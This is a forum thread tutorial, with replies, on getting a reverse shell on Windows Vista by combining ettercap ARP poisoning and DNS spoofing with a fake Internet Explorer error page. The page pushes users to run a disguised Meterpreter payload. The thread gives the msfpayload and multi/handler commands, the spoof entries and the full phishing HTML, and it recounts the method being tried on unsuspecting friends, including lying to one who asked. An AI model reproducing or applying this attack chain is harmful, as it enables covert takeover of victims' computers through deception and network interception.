Results 1 to 10 of 10

Thread: vista reverse shell with ettercap phish--comments please

  1. #1
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    14

    Default vista reverse shell with ettercap phish--comments please

    Hello all. I am new to the posts, and did not know where else to put this idea/tutorial, or at least how i have done my idea. Also apparently i can only post here due to Noob status, i have searched and did not see anything so correct me if i am posting in the wrong place.
    (Back story) I was working with my programs last week, trying to break Vista, when it dawned on me that i could continue with my chosen path of fuzzing and debugging, ....and more than likely find a Vuln . Or i could rely on something thats already Vulnerable... The average computer User. Or as H.D. Moore and Valsmith put it, "MEAT-WARE".

    Please note "ALL" tests were done at home on MY equipment and network, to include: a Dell XPS running Backtrack 3 final as native OS. An Hp running Windows SP3, and a Sony Vaio running Vista Home Premium.
    Also a cheap belkin router for network purposes.
    And of course, a few unsuspecting friends to come over for a visit to test the "Hypothesis" on. lol.
    (Also forgive me for the 'Dr. Evil' feel to this.)

    -Moving on, the original purpose of the idea, which is nothing new. Is to create something that appears REAL to the end user. Phishing, but I'm not after credit cards or mass quantities of info, i want a shell on a SPECIFIC target.
    Backtrack comes with several Services, the one of interest being an HTTP server. Knowing this i created 2 files the first being the index:htm and the other BrowserRestore.htm. I will not post the files, but im sure you can use your imagination. These pages, when viewed from the windows browser use java alerts to tell the user there has been a fatal Error. I went with error 505. Also these pages bear striking resemblance to IE error pages. The end user is then promted, through page 2 and a fake "fake error scan", to run "Browser Restore" an app. run through and by the browser. Does this really exist... NO. Do most users know this, NO.

    The next step is to create the Executable. I chose msfpayload. Using windows/meterpreter/reverse_tcp. My code looks like this. (other payloads may be used, this is just an example, again imagination.)

    #./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.*.* LPORT=4444 X > /var/www/htdocs/Browser-Restore.exe

    We now have an executable file for download and use in the home directory of our HTTP server. My second page contains a link to this file with an added java alert specifying "no need to reboot, pages may be unavailable for a few minutes, you may continue to use your computer, after a few minutes you may need to restart your browser" again, sky's the limit here.

    Now we have the payload set to connect to us, we need a way to use it.
    msfconsole's exploit/multi/handler comes in handy here. My code for this looks like:

    # ./msfconsole
    > use exploit/multi/handler
    >set PAYLOAD windows/meterpreter/reverse_tcp
    >set LHOST 192.168.*.*
    >set LPORT 4444
    >exploit


    I will more than likely automate this later with an .rc file, but for now, it is setup to interact with our session when launched.
    Ok so we have our payload launching .exe file, msfconsole is set to receive and interact, and our fake browser file. Now we need to get the user to this site. Ettercap is the tool i used for this job with the plug in dns_spoof.
    You will need to alter your etter.dns file. Mine is located at

    /usr/local/share/ettercap/etter.dns

    I used nano to alter this file adding links i knew would be used.... google, facebook, myspace, ect. Again target specific.
    #note: You may want to try (*.*.* A 192.168.*.*)
    These will be redirected to the HTTP server on my machine.
    Firing up ettercap, ARP poison your victim and use the pluggin. This does not work on XP that well/or at all, confirmed on the ettercap forums. However this does work on Vista, almost too well. When the #note above was tested EVERY page loaded from the Vista machine was redirected to my 192.168.*.* HTTP server with the fatal error message and how to fix.
    So we know it works.
    The next step would be to wait for your shell. Once acquired you need to STOP the dns_spoof. Giving their target machine time to clear their cache and return to normal.
    My solution was to add an "onexit" java alert for the second web page, wich states "Browser Restore is complete. Please Restart your Internet Browser if your pages are still unavailable after a few minutest. It also may be necessary to clear your temp. internet files. Ect... Ect."
    The target, after a few minutes gets their internet back, and you keep your shell.

    Moving on to a test. Would the average user follow the informative, realistic looking links. YES. 4 friends, and a week later the answer is most definately YES. the ATTACK computer was configured and left on standby in another room. One way or another my 4 buddies either needed to "check their mail" or what have you. And attempted to use my Sony. Wich failed to work, but Succeeded for the attacking machine 4/4 times.
    1 person stopped and asked "uhhhh ...did you do something, its not working?" But was consoled with an answer of "no? How could i do anything im in the living room? Did you break something?", knowing my hobby and then proceeded to blindly click OK, then RUN. And this was the SMART college guy.
    Nevertheless my attacking comp. recieved a shell, every time.

    Thank you for your time, i would love to hear some feedback about this. If you have any questions about files used please feel free to ask, i did not post files, but if you are interested in seeing them, or have a question about one, let me know.
    again,
    thanks

  2. #2
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    3

    Default

    Do you think you could post the pages you made and your "perfected" filter?
    here on the forum
    Thanks

  3. #3
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    14

    Default filter and pages

    Quote Originally Posted by dabom View Post
    Do you think you could post the pages you made and your "perfected" filter?
    here on the forum
    Thanks
    dabom,

    I found this topic in the "Backtrack3 final how to" section. Look for BigMac's posting on ettercap. You will find the filter i use, plus some changes made to the encoding of exe files. But there are still some `kinks` to be worked out of the process.

    As for my web pages. I have renovated them down to one page. I'm going with a revamped Internet Explorer (IE7) error page.
    1) People are more familiar with it
    2) it looks more legit.

    (**I hope that doesn't get me into to much trouble with anyone, for copyright or whatever else reasons with the admins and whoever else is looking **)

    Plus i never could get the look JUST right without the style sheets. But anyway i will post it in another reply.
    As for the filter and DNS_SPOOF. The spoof works on vista, but it seems to have a problem with clearing the cache. So i dropped that part.
    And the filter i use is in the post listed above, i will also try to link it later.
    FILTER == works on Vista and XP, however not on ALL pages. It doesn't work on google and ....if memory serves me right... facebook. Reason being, if you will go to those pages and 'view source' its ALL one line.
    So when the filter replaces text in a line.... it seems to be replacing the ENTIRE line, and giving a 404 error. Im still working on/looking for a solution to that, and several people on the Ettercap forums as well. But thanks to the holidays i haven't been getting too much done with hobbies.
    I think that about sums up where the filter stands, there are more "quirks" with it all, but then again it depends on the target as well.

    Sorry for the long reply but i felt that without giving somewhat of an explanation, you would more than likely be left with that "WTF" feeling, when you started with it.

  4. #4
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    14

    Default the page

    Here is the page i am using now, if there are misspelled words or other errors, sorry, i have been working on it. But also keep in mind this is just mine, use that thing between your ears and get creative. Some seem to prefer the method of inserting to the browser. I like to redirect, simply because the user does not get a choice.

    **For those that know, skip through the next few steps. for those that do not know how to set this up. I'll give some directions.
    The links have been sterilized for obvious reasons.
    To use the page you will need a few things.

    These items are from the Internet Explorer Error pages.
    *All files are case sensitive, if they are not named this way, they will not be called on by the html page

    1) a copy of errorPageStrings.js
    2) a copy of httpErrorPagesScript.js
    3) a copy of ErrorPageTemplate.css
    4) all png images from an IE error page:
    * info_48.png
    * bullet.png
    * down.png
    * up.png

    ~I used google for the js and css pages. (Download them as a file, they do not come in text form, ...that i have found)

    #Easy way to get png images...
    - In Backtrack, go to services and start your HTTPD service
    - From a windows computer, go to your server "hxxp://192.168...ect"
    - Insert a random address, Example: hxxp://192.168.1.4/hello
    - REPLACE the "X" with a "T" in "hxxp://"
    - If you did not know the previous step, STOP.
    - This should bring up the normal 404 error page.
    - Right click on all images. Select "Save Picture As ". To save time later, save them as named above in bullets.
    - Copy these onto an external media, ssh, or smb them to your Backtrack computer, put them with the js and css files in your server's home directory.

    # For the page itself:
    - You will need to rename your OLD " index.html " file.
    - Create a new text file and name it whatever you want for now.
    - Copy my page info and paste to the new text file.
    - Read through and change the links to YOUR addy or to your exe file.
    * Or change whatever you want... Its your computer.
    * Also note your IP will change from network to network.
    - Then rename the file " index.html "
    - DONE

    ** Dont take offense to the directions, you never know, they may come in handy for soeone **

  5. #5
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    14

    Default the page

    #PAGE
    <html>

    <head>
    <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css" >

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Web Browser Recovery</title>

    <script src="errorPageStrings.js" language="javascript" type="text/javascript">
    </script>
    <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">
    </script>
    </head>
    <script language="javascript">
    <!--
    alert("The page you are viewing has encountered a Fatal Error.")
    //-->
    </script>


    <script language="javascript">
    <!--
    alert("Please see the Error page for more information on how to correct this problem.")
    //-->
    </script>

    <body onLoad="javascript:initMoreInfo('infoBlockID');">

    <table width="730" cellpadding="0" cellspacing="0" border="0">

    <!-- Error title -->
    <tr>
    <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">
    <img src="info_48.png" id="infoIcon" alt="Info icon">
    </td>
    <td id="mainTitleAlign" valign="middle" align="left" width="*">
    <h1 id="mainTitle">The Web Browser Restore Utility</h1>
    </td>
    </tr>

    <tr>
    <!-- This row is for HTTP status code, as well as the divider-->
    <td id="errorCodeAlign" class="errorCodeAndDivider" align="right">&nbsp;
    <div class="divider"></div>
    </td>
    </tr>


    <!-- Scan Script -->
    <tr>
    <td>
    &nbsp;
    </td>
    <td id="MostLikelyAlign" valign="top" align="left">
    <h3 id="likelyCauses">Recovery Browser Scan:</h3>
    <ul>
    <li id="causeNotConnected"><script>

    /*Displaying a user's browser type script*/

    if (document.all)
    var version=/MSIE \d+.\d+/

    if (!document.all)
    document.write("You are using "+navigator.appName+" "+navigator.userAgent)
    else
    document.write("You are using "+navigator.appName+" "+navigator.appVersion.match(version))

    </script></li>
    <li id="causeSiteProblem">The Browser Font Encoder is not responding correctly.</li>
    <li id="causeErrorInAddress">The File responded with error code:</li>
    <ul id="errormessage" valign="top" align="left"><h5>HTML 505 -- Fatal Error</h5></ul>
    </ul>
    </td>
    </tr>

    <!-- Whats wrong -->
    <tr>
    <td>
    &nbsp;
    </td>
    <td id="whatToTryAlign" valign="top" align="left">
    <h2 id="whatToTry">Damaged File Corrective Action:</h2>
    </td>
    </tr>

    <!-- firewall boo hoo -->
    <tr>
    <td >
    &nbsp;
    </td>
    <td id="checkConnectionAlign" align="left" valign="middle">
    <h4>
    <table>

    <tr>
    <td valign="top">
    <img src="bullet.png" border="0" alt="" class="actionIcon">
    </td>
    <td valign="top">
    <ID id="installInfo">Note: Your Firewall may attempt to stop corrective action, due to unavailable port options. Please allow this program to connect to the Live Help Database.</ID>
    </td>
    </tr>
    <tr>
    <td valign="top">
    <img src="bullet.png" border="0" alt="" class="actionIcon">
    </td>
    <td valign="top">
    <ID id="installInfo">When Promted, Select 'RUN' and 'ALLOW', Browser Restore will attempt to re-install your plug-ins.</ID>
    </td>
    </tr>
    <tr>
    <td valign="top">
    <img src="bullet.png" border="0" alt="" class="actionIcon">
    </td>
    <td valign="top">
    <ID id="installInfo">Please allow a few minutes for the program to run. A system reboot is not required for this error..</ID>
    </td>
    </tr>
    <tr>
    <td valign="top">
    <img src="bullet.png" border="0" alt="" class="actionIcon">
    </td>
    <td valign="top">
    <a href="/\/\/\/\/\Insert EXE file's name here/\/\/\/\/\/\/\" onclick="return alert('Browser Restore needs to connect to the internet to download your plug-ins. Make sure you allow this program when prompted.');"><U>Click Here To Run Browser Restore.</U></ID></a>
    </td>
    </tr>
    </table>
    </h4>
    </td>
    </tr>

    <!-- InfoBlock -->
    <tr>
    <td id="infoBlockAlign" align="right" valign="top">
    &nbsp;
    </td>
    <td id="moreInformationAlign" align="left" valign="middle">
    <h4>
    <table>
    <tr>
    <td valign="top">
    <a href="#" onclick="javascript:expandCollapse('infoBlockID', true); return false;"><img src="down.png" id="infoBlockIDImage" border="0" class="actionIcon" alt="More information"></a>
    </td>
    <td valign="top">
    <span id="moreInfoContainer"></span>
    <noscript><ID id="moreInformation">Browser Restore Information</ID></noscript>
    </td>
    </tr>
    </table>
    </h4>

    <div id="infoBlockID" class="infoBlock" style="display: none">
    <p>
    <ID id="errorExpl1">Browser Recovery tool:</ID>
    <ul>
    <li id="errorExpl2">Browser Restore is provided to you, the user, for convenience of service.</li>
    <li id="errorExpl3">The executable will re-install damaged or unreliable software in the browser Directory(Dir.).</li>
    <li id="errorExpl4">The End-User License Agreement can be referenced Via the browser Dir.</li>
    <li id="errorExpl5">The License Agreement will take on no changes from updates made with Browser Restore.</li>
    <li id="errorExpl6">Some ActiveX controlls may be needed in order to complete download and installation, If these tools are blocked by the Browser, it is recommended that you unblock them via the Icon bar at TOP of page.</li>
    </ul>
    </p>


    </div>
    </td>
    </tr>

    </table>

    </body>
    </html>
    Alright, hope that about covers it. Enjoy and let me know what u think. Again its a work in progress so give some feedback.

  6. #6
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    3

    Default

    Thanks, looks great. I've made a couple minor changes to it (spelling, capitalization) but nothing worth posting.

    I'm not sure why dns_spoof wasn't working for you in XP but it works fine for me:
    * A 192.168.X.X
    *.* A 192.168.X.X
    *.*.* A 192.168.X.X
    *.*.*.* A 192.168.X.X

    I recompiled thttpd so that it wouldn't show its version at the bottom when you get a 404 (which is redirected to the "error" page) and it's working perfectly.

    Your ettercap filter didn't work for me.

    P.S. Those files (.js and .css) were a pain to find.

  7. #7
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    14

    Default

    Quote Originally Posted by dabom View Post
    Thanks, looks great. I've made a couple minor changes to it (spelling, capitalization) but nothing worth posting.

    I'm not sure why dns_spoof wasn't working for you in XP but it works fine for me:
    * A 192.168.X.X
    *.* A 192.168.X.X
    *.*.* A 192.168.X.X
    *.*.*.* A 192.168.X.X

    I recompiled thttpd so that it wouldn't show its version at the bottom when you get a 404 (which is redirected to the "error" page) and it's working perfectly.

    Your ettercap filter didn't work for me.

    P.S. Those files (.js and .css) were a pain to find.
    Thanks, i hope you find a good use for all this. Im still re-doing the page from the original version, i need to change the "more info" and clean it all up a good bit.
    Which version (SP?) of XP are you using dns_spoof against?
    ...Also are you running a WEP or WPA encryption on your network?
    Vista seems to be more "cautious" when run on an "open" network. It also may be noteworthy that out of all the versions of Vista, the home packages don't seem to give me the IDS firewall "ALLOW?" box. However the premium and professional packages do. Maybe thats why they cost more, lol.
    Yes, those files were a pain to find. I think i got mine from a net directory in a really weird place, on about the 9th page of a google search.

  8. #8
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    3

    Default

    XP SP3 and on an open network with mac filtering athough the mac filtering is not really relevant.
    Please post the new version once you are done.

  9. #9
    Member
    Join Date
    Mar 2010
    Posts
    123

    Default

    Just stumbled in on this and i really like the concept.

    I will have a play with this when i get a bit of spare time - but hey, what a novel idea of a shell. Just ask the end user to click you in nice. Sounds like a kinda messed up social engineering technique.

    Nice 1

  10. #10
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    3

    Default

    Very nice Tuto.

    I tried it against a vista machine and it worked perfectly with everything on.

    I have to improve my web page to look better, but I like the concept too.

    Good job

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •